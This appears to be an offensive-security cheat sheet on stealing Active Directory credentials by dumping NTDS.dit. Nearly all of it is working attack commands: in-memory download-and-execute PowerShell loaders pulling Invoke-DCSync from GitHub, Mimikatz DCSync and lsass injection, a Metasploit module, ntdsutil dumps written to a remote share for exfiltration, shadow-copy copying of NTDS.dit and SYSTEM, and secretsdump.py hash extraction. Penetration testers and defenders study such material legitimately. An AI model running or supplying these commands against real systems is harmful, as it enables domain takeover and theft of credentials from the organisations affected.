Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.
In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.
Invoke-DCsync pulls Mimikatz,PowerView and ADRecon from Github into memory and then performs DCSync.
# Load into memoryIEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/pentestfactory/Invoke-DCSync/main/Invoke-DCSync.ps1")# ExecuteInvoke-DCSync
Invoke-DCSync (S3cur3Th1sSh1t)
# Load into memoryIEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Invoke-DCSync.ps1")# ExecuteInvoke-DCSync-dcfqdn DC01.security.local -username administrator
Metasploit
use auxiliary/admin/smb/psexec_ntdsgrab
secretsdump.py can then be used to pull hashes from the ntds.dit database using the SYSTEM hive file (ref: secretsdump.py further down).
Mimikatz
# Dump hashes for a specified usersInvoke-Mimikatz-command '"lsadump::dcsync /domain:security.local /user:moe"'# Dump hashes for all usersInvoke-Mimikatz-command '"lsadump::dcsync /domain:security.local /all"'# Dump hashes by injecting into the lsass process on the Domain ControllerInvoke-Mimikatz-command '"lsadump::lsa /inject"'
ntdsutil.exe (Native)
With access to the Domain Controller its possible to run the ntdsutil.exe native binary to dump SAM, SYSTEM and ntds.dit ready for exfiltration.
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\Exfiltration' q q"# Dump to remote sharepowershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full \\10.10.10.10\Share\Exf' q q"
Viewing the contents of c:\Exfiltration we see the files.
Secretsdump we can be used against these files for extraction as shown in the secretsdump.py section below.
Secretsdump.py
# With valid credentialssecretsdump.pysecurity.local/moe:Password123@10.10.10.100-just-dc-ntlm
# Dump from exfiltrated ntds.dit and SYSTEM files.sudosecretsdump.py-ntdsntds.dit-systemSYSTEMLOCAL
# Dump results from ntdsutil.exe methodsecretsdump.py-systemSYSTEM-securitySECURITY-ntdsntds.ditLOCAL
PsMapExec
# As current userPsMapExec -Targets DCs -Method SMB -Module NTDS# As a specified userPsMapExec -Targets DCs -Method SMB -Module NTDS -Username Administrator -Password Password123!
Volume Shadow Copy
# Create VSS snapshot of system drivevssadmincreateshadow/for=C:# create a copy of NTDS.dit and SYSTEM then move to C:\Exfiltrationcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.ditC:\Exfiltrationcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEMC:\Exfiltration
The NTDS.dit and SYSTEM files can be exfiltrated off the system and used with a tool such as secretsdump.py for hash extraction.